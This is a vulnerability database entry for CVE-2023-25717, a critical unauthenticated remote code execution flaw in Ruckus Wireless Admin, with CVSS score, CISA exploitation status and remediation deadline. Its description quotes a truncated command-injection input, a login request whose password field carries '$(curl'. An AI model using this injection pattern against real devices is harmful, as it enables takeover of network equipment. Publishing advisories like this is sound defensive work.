CVE-2023-25717

ruckuswireless ruckus wireless admin, ruckuswireless smartzone ap, commscope ruckus smartzone firmware

Published 13 Feb 2023 · updated 17 Jun 2026 · Analyzed

9.8 Critical · CVSS 3.1, NVD

Exploited in the wild

CISA added this to its Known Exploited Vulnerabilities catalog on 12 May 2023, with a remediation deadline of 2 Jun 2023 for US federal agencies.

Required action: Apply updates per vendor instructions or disconnect product if it is end-of-life.

Description

Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request, as demonstrated by a /forms/doLogin?login_username=admin&password=password$(curl substring.

References